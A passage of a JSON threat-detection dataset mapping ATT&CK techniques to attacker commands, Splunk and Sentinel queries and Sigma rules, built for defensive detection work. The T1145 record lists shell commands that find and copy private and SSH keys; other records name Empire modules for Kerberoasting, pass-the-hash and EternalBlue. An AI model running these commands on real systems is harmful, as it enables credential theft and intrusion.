"Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=linux_audit syscall=82 exe=/usr/bin/shred | table host,auid,uid,eid,exe", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "-a always,exit -F arch=b64 -S execve,execveat -F auid>=1000 -F auid!=-1 -F key=program_execution", + "name": "" + }, + { + "product": "Splunk", + "query": "-w /home/ec2-user/.bash_history -p rwa -k bash_history_changes", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=\"bash_history\" bash_command=\"rm *\"", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=\"bash_history\" bash_command=\"shred -u *\"", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + } + ], + "possible_detections": [ + "auditlogs (audit.rules)", + "bash_history logs", + { + "title": "Backup Catalog Deleted", + "id": "9703792d-fd9a-456d-a672-ff92efe4806a", + "status": "experimental", + "description": "Detects backup catalog deletions", + "references": [ + "https://technet.microsoft.com/en-us/library/cc742154(v=ws.11).aspx", + "https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100" + ], + "author": "Florian Roth (rule), Tom U. @c_APT_ure (collection)", + "tags": [ + "attack.defense_evasion", + "attack.t1107" + ], + "logsource": { + "product": "windows", + "service": "application" + }, + "detection": { + "selection": { + "EventID": 524, + "Source": "Backup" + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ], + "level": "medium" + }, + [ + "4688 ", + "Process CMD Line" + ], + [ + "4663", + "File monitoring" + ], + [ + "B9", + "Binary file metadata" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4663", + "File monitoring" + ], + [ + "LOG-MD - B9", + "Binary file metadata" + ] + ], + "external_reference": [ + "https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html", + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", + "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html", + "http://www.secureworks.com/resources/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems/", + "https://content.fireeye.com/apt/rpt-apt38", + "https://www.justice.gov/opa/press-release/file/1121706/download", + "https://www.justice.gov/file/1080281/download", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/", + "https://www.us-cert.gov/ncas/alerts/TA17-164A", + "https://www.youtube.com/watch?v=fevGZs0EQu8", + "https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/", + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", + "https://www.accenture.com/t20180423T055005Z_w_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin10.pdf", + "https://www.fireeye.com/blog/threat-research/2014/04/new-zero-day-exploit-targeting-internet-explorer-versions-9-through-11-identified-in-targeted-attacks.html", + "https://citizenlab.org/2016/08/group5-syria/", + "https://www.us-cert.gov/ncas/alerts/TA17-293A", + "https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html", + "https://www.secureworks.com/research/bronze-union", + "https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf", + "https://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf" + ] + }, + { + "technique_id": "T1118", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 3 and (process_path contains \"InstallUtil.exe\"or process_command_line contains \"\\\\/logfile= \\\\/LogToConsole=false \\\\/U\")", + "name": "InstallUtil" + } + ], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "ID 1 & 7", + "Sysmon" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ] + ], + "external_reference": [] + }, + { + "technique_id": "T1126", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and (process_path contains \"net.exe\"and process_command_line contains \"net delete\")or process_command_line contains \"Remove-SmbShare\"or process_command_line contains \"Remove-FileShare\"", + "name": "Network Share Connection Removal" + } + ], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "5140/5145", + "Net Shares" + ], + [ + "4624", + "Authentication logs" + ], + [ + "Packet capture" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "5140/5145", + "Net Shares" + ], + [ + "4624", + "Authentication logs" + ], + [ + "Packet capture" + ] + ], + "external_reference": [ + "https://www.secureworks.com/research/bronze-union" + ] + }, + { + "technique_id": "T1130", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where (EventID == 12 or EventID == 13 or EventID == 14)and process_path !contains \"svchost.exe\"and (registry_key_path contains \"*\\\\SOFTWARE\\\\Microsoft\\\\EnterpriseCertificates\\\\Root\\\\Certificates\\\\*\"or registry_key_path contains \"*\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\*\")", + "name": "Install Root Certificates" + } + ], + "possible_detections": [ + [ + "4657", + "Reg Audit" + ], + [ + "SSL/TLS inspection" + ], + [ + "Digital Certificate Logs" + ], + [ + "4657", + "Reg Audit" + ], + [ + "SSL/TLS inspection" + ], + [ + "Digital Certificate Logs" + ] + ], + "external_reference": [] + }, + { + "technique_id": "T1179", + "command_list": [ + "powershell/collection/netripper" + ], + "commands": [ + { + "command": "powershell/collection/netripper", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Empire Module": "powershell/collection/netripper", + "ATT&CK Technique #1": "T1179", + "ATT&CK Technique #2": "", + "Technique": "Hooking", + "Concatenate for Python Dictionary": "\"powershell/collection/netripper\": [\"T1179\"]," + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1and (process_path contains \"mavinject.exe\"or process_command_line contains \"/INJECTRUNNING\")", + "name": "Hooking" + } + ], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "Windows event logs" + ], + [ + "Sysmon ID 7", + "DLL monitoring" + ], + [ + "Sysmon - ID 7", + "Loaded DLLs" + ], + [ + "API monitoring" + ], + [ + "Binary file metadata" + ], + [ + "Sysmon ID 7", + "DLL monitoring" + ], + [ + "Sysmon - ID 7", + "Loaded DLLs" + ], + [ + "4688", + "Process Execution" + ], + [ + "Windows event logs" + ], + [ + "API monitoring" + ], + [ + "Binary file metadata" + ] + ], + "external_reference": [] + }, + { + "technique_id": "T1209", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where (EventID == 12 or EventID == 13 or EventID == 14)and registry_key_path contains \"\\\\System\\\\CurrentControlSet\\\\Services\\\\W32Time\\\\TimeProviders\\\\\"", + "name": "Time Providers" + } + ], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "DLL monitoring" + ], + [ + "Loaded DLLs" + ], + [ + "API monitoring" + ], + [ + "Binary file metadata" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "Sysmon ID 7", + "DLL monitoring" + ], + [ + "Sysmon ID 7", + "Loaded DLLs" + ], + [ + "API monitoring" + ], + [ + "LOG-MD - B9", + "Binary file metadata" + ] + ], + "external_reference": [] + }, + { + "technique_id": "T1214", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and (process_command_line contains \"reg query HKLM \\\\/f password \\\\/t REG_SZ \\\\/s\"or process_command_line contains \"reg query HKCU \\\\/f password \\\\/t REG_SZ \\\\/s\"or process_command_line contains \"Get-UnattendedInstallFile\"or process_command_line contains \"Get-Webconfig\"or process_command_line contains \"Get-ApplicationHost\"or process_command_line contains \"Get-SiteListPassword\"or process_command_line contains \"Get-CachedGPPPassword\"or process_command_line contains \"Get-RegistryAutoLogon\")", + "name": "Credentials In Registry" + } + ], + "possible_detections": [ + [ + "4657", + "Windows Registry" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4657", + "Windows Registry" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ] + ], + "external_reference": [] + }, + { + "technique_id": "T1171", + "command_list": [ + "powershell/collection/inveigh", + "powershell/lateral_movement/inveigh_relay" + ], + "commands": [ + { + "command": "powershell/collection/inveigh", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/lateral_movement/inveigh_relay", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Empire Module": "powershell/collection/inveigh", + "ATT&CK Technique #1": "T1171", + "ATT&CK Technique #2": "", + "Technique": "LLMNR/NBT-NS Poisoning", + "Concatenate for Python Dictionary": "\"powershell/collection/inveigh\": [\"T1171\"]," + }, + { + "Empire Module": "powershell/lateral_movement/inveigh_relay", + "ATT&CK Technique #1": "T1171", + "ATT&CK Technique #2": "", + "Technique": "LLMNR/NBT-NS Poisoning", + "Concatenate for Python Dictionary": "\"powershell/lateral_movement/inveigh_relay\": [\"T1171\"]," + } + ], + "queries": [], + "possible_detections": [ + { + "title": "RottenPotato Like Attack Pattern", + "id": "16f5d8ca-44bd-47c8-acbe-6fc95a16c12f", + "status": "experimental", + "description": "Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like", + "references": [ + "https://twitter.com/SBousseaden/status/1195284233729777665" + ], + "author": "@SBousseaden, Florian Roth", + "date": "2019/11/15", + "tags": [ + "attack.privilege_escalation", + "attack.credential_access", + "attack.t1171" + ], + "logsource": { + "product": "windows", + "service": "security" + }, + "detection": { + "selection": { + "EventID": 4624, + "LogonType": 3, + "TargetUserName": "ANONYMOUS_LOGON", + "WorkstationName": "-", + "SourceNetworkAddress": "127.0.0.1" + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + [ + "4657", + "Windows Registry" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "Packet capture" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "4657", + "Windows Registry" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "Packet capture" + ], + [ + "Netflow/Enclave netflow" + ] + ], + "external_reference": [] + }, + { + "technique_id": "T1141", + "command_list": [ + "powershell/collection/prompt", + "python/collection/osx/prompt", + "python/collection/osx/screensaver_alleyoop" + ], + "commands": [ + { + "command": "powershell/collection/prompt", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/collection/osx/prompt", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/collection/osx/screensaver_alleyoop", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Empire Module": "powershell/collection/prompt", + "ATT&CK Technique #1": "T1141", + "ATT&CK Technique #2": "", + "Technique": "Input Prompt", + "Concatenate for Python Dictionary": "\"powershell/collection/prompt\": [\"T1141\"]," + }, + { + "Empire Module": "python/collection/osx/prompt", + "ATT&CK Technique #1": "T1141", + "ATT&CK Technique #2": "", + "Technique": "Input Prompt", + "Concatenate for Python Dictionary": "\"python/collection/osx/prompt\": [\"T1141\"]," + }, + { + "Empire Module": "python/collection/osx/screensaver_alleyoop", + "ATT&CK Technique #1": "T1141", + "ATT&CK Technique #2": "", + "Technique": "Input Prompt", + "Concatenate for Python Dictionary": "\"python/collection/osx/screensaver_alleyoop\": [\"T1141\"]," + } + ], + "queries": [], + "possible_detections": [], + "external_reference": [ + "https://www.fireeye.com/current-threats/threat-intelligence-reports/rpt-fin4.html", + "https://www2.fireeye.com/WBNR-14Q4NAMFIN4.html" + ] + }, + { + "technique_id": "T1208", + "command_list": [ + "powershell/credentials/invoke_kerberoast" + ], + "commands": [ + { + "command": "powershell/credentials/invoke_kerberoast", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Empire Module": "powershell/credentials/invoke_kerberoast", + "ATT&CK Technique #1": "T1208", + "ATT&CK Technique #2": "", + "Technique": "Kerberoasting", + "Concatenate for Python Dictionary": "\"powershell/credentials/invoke_kerberoast\": [\"T1208\"]," + } + ], + "queries": [], + "possible_detections": [ + { + "title": "Possible SPN Enumeration", + "id": "1eeed653-dbc8-4187-ad0c-eeebb20e6599", + "description": "Detects Service Principal Name Enumeration used for Kerberoasting", + "status": "experimental", + "references": [ + "https://p16.praetorian.com/blog/how-to-use-kerberoasting-t1208-for-privilege-escalation" + ], + "author": "Markus Neis, keepwatch", + "date": "2018/11/14", + "tags": [ + "attack.credential_access", + "attack.t1208" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection_image": { + "Image": "*\\setspn.exe" + }, + "selection_desc": { + "Description": "*Query or reset the computer* SPN attribute*" + }, + "cmd": { + "CommandLine": "*-q*" + }, + "condition": "(selection_image or selection_desc) and cmd" + }, + "falsepositives": [ + "Administrator Activity" + ], + "level": "medium" + }, + { + "title": "Suspicious Kerberos RC4 Ticket Encryption", + "id": "496a0e47-0a33-4dca-b009-9e6ca3591f39", + "status": "experimental", + "references": [ + "https://adsecurity.org/?p=3458", + "https://www.trimarcsecurity.com/single-post/TrimarcResearch/Detecting-Kerberoasting-Activity" + ], + "tags": [ + "attack.credential_access", + "attack.t1208" + ], + "description": "Detects service ticket requests using RC4 encryption type", + "logsource": { + "product": "windows", + "service": "security" + }, + "detection": { + "selection": { + "EventID": 4769, + "TicketOptions": "0x40810000", + "TicketEncryptionType": "0x17" + }, + "reduction": [ + { + "ServiceName": "$*" + } + ], + "condition": "selection and not reduction" + }, + "falsepositives": [ + "Service accounts used on legacy systems (e.g. NetApp)", + "Windows Domains with DFL 2003 and legacy systems" + ], + "level": "medium" + }, + [ + "4769", + "Windows event logs" + ], + [ + "4769", + "Windows event logs" + ] + ], + "external_reference": [] + }, + { + "technique_id": "T1145", + "command_list": [ + "powershell/credentials/mimikatz/certs", + "powershell/credentials/mimikatz/keys", + "**Private Keys:**", + "find / -type f \\( -name \"*.pem\" -o -name \"*.pgp\" -o -name \"*.gpg\" -o -name \"*.ppk\" -o -name \"*.p12\" -o -name \"*.key\" -o -name \"*.pfx\" -o -name \"*.cer\" -o -name \"*.p7b\" -o -name \"*.asc\" -o -name \"authorized*\" \\)", + "**look for Users' SSH Private Key:** find / -name id_rsa OR find / -name id_dsa", + "**Copy Private SSH Keys with CP:** find / -name id_rsa -exec cp --parents {} #{output_folder} \\;", + "find / -name id_dsa -exec cp --parents {} #{output_folder} \\;", + "**Copy Private SSH Keys with rsync:**", + "find / -name id_rsa -exec rsync -R {} #{output_folder} \\;", + "find / -name id_dsa -exec rsync -R {} #{output_folder} \\;" + ], + "commands": [ + { + "command": "powershell/credentials/mimikatz/certs", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/credentials/mimikatz/keys", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "**Private Keys:**", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "find / -type f \\( -name \"*.pem\" -o -name \"*.pgp\" -o -name \"*.gpg\" -o -name \"*.ppk\" -o -name \"*.p12\" -o -name \"*.key\" -o -name \"*.pfx\" -o -name \"*.cer\" -o -name \"*.p7b\" -o -name \"*.asc\" -o -name \"authorized*\" \\)", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "**look for Users' SSH Private Key:** find / -name id_rsa OR find / -name id_dsa", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "**Copy Private SSH Keys with CP:** find / -name id_rsa -exec cp --parents {} #{output_folder} \\;", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "find / -name id_dsa -exec cp --parents {} #{output_folder} \\;", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "**Copy Private SSH Keys with rsync:**", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "find / -name id_rsa -exec rsync -R {} #{output_folder} \\;", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "find / -name id_dsa -exec rsync -R {} #{output_folder} \\;", + "source": "Kirtar22/Litmus_Test", + "name": "" + } + ], + "parsed_datasets": [ + { + "Empire Module": "powershell/credentials/mimikatz/certs", + "ATT&CK Technique #1": "T1145", + "ATT&CK Technique #2": "", + "Technique": "Private Keys", + "Concatenate for Python Dictionary": "\"powershell/credentials/mimikatz/certs\": [\"T1145\"]," + }, + { + "Empire Module": "powershell/credentials/mimikatz/keys", + "ATT&CK Technique #1": "T1145", + "ATT&CK Technique #2": "", + "Technique": "Private Keys", + "Concatenate for Python Dictionary": "\"powershell/credentials/mimikatz/keys\": [\"T1145\"]," + } + ], + "queries": [ + { + "product": "Splunk", + "query": "index=* sourcetype=bash_history find AND (.pem OR authorized OR gpg OR pgp OR .ppk OR .cer OR .key OR .asc)", + "name": "" + }, + { + "product": "Splunk", + "query": "index=* sourcetype=bash_history find AND (id_rsa OR id_dsa)", + "name": "" + } + ], + "possible_detections": [ + "bash_history logs", + [ + "4657", + "File monitoring" + ], + [ + "4657", + "File monitoring" + ] + ], + "external_reference": [] + }, + { + "technique_id": "T1075", + "command_list": [ + "powershell/credentials/mimikatz/pth" + ], + "commands": [ + { + "command": "powershell/credentials/mimikatz/pth", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Empire Module": "powershell/credentials/mimikatz/pth", + "ATT&CK Technique #1": "T1075", + "ATT&CK Technique #2": "", + "Technique": "Pass the Hash", + "Concatenate for Python Dictionary": "\"powershell/credentials/mimikatz/pth\": [\"T1075\"]," + } + ], + "queries": [], + "possible_detections": [ + { + "title": "Successful Overpass the Hash Attempt", + "id": "192a0330-c20b-4356-90b6-7b7049ae0b87", + "status": "experimental", + "description": "Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.", + "references": [ + "https://cyberwardog.blogspot.de/2017/04/chronicles-of-threat-hunter-hunting-for.html" + ], + "author": "Roberto Rodriguez (source), Dominik Schaudel (rule)", + "date": "2018/02/12", + "tags": [ + "attack.lateral_movement", + "attack.t1075", + "attack.s0002" + ], + "logsource": { + "product": "windows", + "service": "security" + }, + "detection": { + "selection": { + "EventID": 4624, + "LogonType": 9, + "LogonProcessName": "seclogo", + "AuthenticationPackageName": "Negotiate" + }, + "condition": "selection" + }, + "falsepositives": [ + "Runas command-line tool using /netonly parameter" + ], + "level": "high" + }, + { + "title": "Pass the Hash Activity", + "id": "f8d98d6c-7a07-4d74-b064-dd4a3c244528", + "status": "experimental", + "description": "Detects the attack technique pass the hash which is used to move laterally inside the network", + "references": [ + "https://github.com/iadgov/Event-Forwarding-Guidance/tree/master/Events" + ], + "author": "Ilias el Matani (rule), The Information Assurance Directorate at the NSA (method)", + "tags": [ + "attack.lateral_movement", + "attack.t1075", + "car.2016-04-004" + ], + "logsource": { + "product": "windows", + "service": "security", + "definition": "The successful use of PtH for lateral movement between workstations would trigger event ID 4624, a failed logon attempt would trigger an event ID 4625" + }, + "detection": { + "selection": [ + { + "EventID": 4624, + "LogonType": "3", + "LogonProcessName": "NtLmSsp", + "WorkstationName": "%Workstations%", + "ComputerName": "%Workstations%" + }, + { + "EventID": 4625, + "LogonType": "3", + "LogonProcessName": "NtLmSsp", + "WorkstationName": "%Workstations%", + "ComputerName": "%Workstations%" + } + ], + "filter": { + "AccountName": "ANONYMOUS LOGON" + }, + "condition": "selection and not filter" + }, + "falsepositives": [ + "Administrator activity", + "Penetration tests" + ], + "level": "medium" + }, + { + "title": "Pass the Hash Activity", + "id": "8eef149c-bd26-49f2-9e5a-9b00e3af499b", + "status": "production", + "description": "Detects the attack technique pass the hash which is used to move laterally inside the network", + "references": [ + "https://github.com/iadgov/Event-Forwarding-Guidance/tree/master/Events", + "https://blog.binarydefense.com/reliably-detecting-pass-the-hash-through-event-log-analysis", + "https://blog.stealthbits.com/how-to-detect-pass-the-hash-attacks/" + ], + "author": "Dave Kennedy, Jeff Warren (method) / David Vassallo (rule)", + "tags": [ + "attack.lateral_movement", + "attack.t1075" + ], + "logsource": { + "product": "windows", + "service": "security", + "definition": "The successful use of PtH for lateral movement between workstations would trigger event ID 4624" + }, + "detection": { + "selection": [ + { + "EventID": 4624, + "SubjectUserSid": "S-1-0-0", + "LogonType": "3", + "LogonProcessName": "NtLmSsp", + "KeyLength": "0" + }, + { + "EventID": 4624, + "LogonType": "9", + "LogonProcessName": "seclogo" + } + ], + "filter": { + "AccountName": "ANONYMOUS LOGON" + }, + "condition": "selection and not filter" + }, + "falsepositives": [ + "Administrator activity", + "Penetration tests" + ], + "level": "medium" + }, + { + "title": "NTLM Logon", + "id": "98c3bcf1-56f2-49dc-9d8d-c66cf190238b", + "status": "experimental", + "description": "Detects logons using NTLM, which could be caused by a legacy source or attackers", + "references": [ + "https://twitter.com/JohnLaTwC/status/1004895028995477505", + "https://goo.gl/PsqrhT" + ], + "author": "Florian Roth", + "date": "2018/06/08", + "tags": [ + "attack.lateral_movement", + "attack.t1075" + ], + "logsource": { + "product": "windows", + "service": "ntlm", + "definition": "Reqiures events from Microsoft-Windows-NTLM/Operational" + }, + "detection": { + "selection": { + "EventID": 8002, + "CallingProcessName": "*" + }, + "condition": "selection" + }, + "falsepositives": [ + "Legacy hosts" + ], + "level": "low" + }, + [ + "4624", + "Authentication logs" + ], + [ + "4624", + "Authentication logs" + ] + ], + "external_reference": [ + "https://www.justice.gov/file/1080281/download", + "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf", + "https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf", + "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf" + ] + }, + { + "technique_id": "T1210", + "command_list": [ + "powershell/exploitation/exploit_jboss", + "powershell/exploitation/exploit_jenkins", + "powershell/situational_awareness/network/get_exploitable_system", + "powershell/exploitation/exploit_eternalblue" + ], + "commands": [ + { + "command": "powershell/exploitation/exploit_jboss", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/exploitation/exploit_jenkins", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/get_exploitable_system", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/exploitation/exploit_eternalblue", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Empire Module": "powershell/exploitation/exploit_jboss", + "ATT&CK Technique #1": "T1210", + "ATT&CK Technique #2": "T1190", + "Technique": "Exploitation of Remote Services", + "Concatenate for Python Dictionary": "\"powershell/exploitation/exploit_jboss\": [\"T1210\",\"T1190\"]," + }, + { + "Empire Module": "powershell/exploitation/exploit_jenkins", + "ATT&CK Technique #1": "T1210", + "ATT&CK Technique #2": "T1190", + "Technique": "Exploitation of Remote Services", + "Concatenate for Python Dictionary": "\"powershell/exploitation/exploit_jenkins\": [\"T1210\",\"T1190\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/get_exploitable_system", + "ATT&CK Technique #1": "T1210", + "ATT&CK Technique #2": "", + "Technique": "Exploitation of Remote Services", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/get_exploitable_system\": [\"T1210\"]," + }, + { + "Empire Module": "powershell/exploitation/exploit_eternalblue", + "ATT&CK Technique #1": "T1210", + "ATT&CK Technique #2": "T1212", + "Technique": "Exploitation of Remote Services", + "Concatenate for Python Dictionary": "\"powershell/exploitation/exploit_eternalblue\": [\"T1210\",\"T1212\"]," + } + ], + "queries": [], + "possible_detections": [ + { + "title": "Suspicious Outbound RDP Connections", + "id": "ed74fe75-7594-4b4b-ae38-e38e3fd2eb23", + "status": "experimental", + "description": "Detects Non-Standard Tools Connecting to TCP port 3389 indicating possible lateral movement", + "references": [ + "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708" + ], + "author": "Markus Neis - Swisscom", + "date": "2019/05/15", + "tags": [ + "attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" + ], + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection": { + "EventID": 3, + "DestinationPort": 3389, + "Initiated": "true" + }, + "filter": { + "Image": [ + "*\\mstsc.exe", + "*\\RTSApp.exe", + "*\\RTS2App.exe", + "*\\RDCMan.exe", + "*\\ws_TunnelService.exe", + "*\\RSSensor.exe", + "*\\RemoteDesktopManagerFree.exe", + "*\\RemoteDesktopManager.exe", + "*\\RemoteDesktopManager64.exe", + "*\\mRemoteNG.exe", + "*\\mRemote.exe", + "*\\Terminals.exe", + "*\\spiceworks-finder.exe", + "*\\FSDiscovery.exe", + "*\\FSAssessment.exe", + "*\\MobaRTE.exe", + "*\\chrome.exe", + "*\\thor.exe", + "*\\thor64.exe" + ] + }, + "condition": "selection and not filter" + }, + "falsepositives": [ + "Other Remote Desktop RDP tools" + ], + "level": "high" + }, + { + "title": "Scanner PoC for CVE-2019-0708 RDP RCE vuln", + "id": "8400629e-79a9-4737-b387-5db940ab2367", + "description": "Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep", + "references": [ + "https://twitter.com/AdamTheAnalyst/status/1134394070045003776", + "https://github.com/zerosum0x0/CVE-2019-0708" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" + ], + "author": "Florian Roth (rule), Adam Bradbury (idea)", + "date": "2019/06/02", + "logsource": { + "product": "windows", + "service": "security" + }, + "detection": { + "selection": { + "EventID": 4625, + "AccountName": "AAAAAAA" + }, + "condition": "selection" + }, + "falsepositives": [ + "Unlikely" + ], + "level": "critical" + }, + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "1000", + " 1001", + "Windows Error Reporting" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "1000", + " 1001", + "Windows Error Reporting" + ], + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network 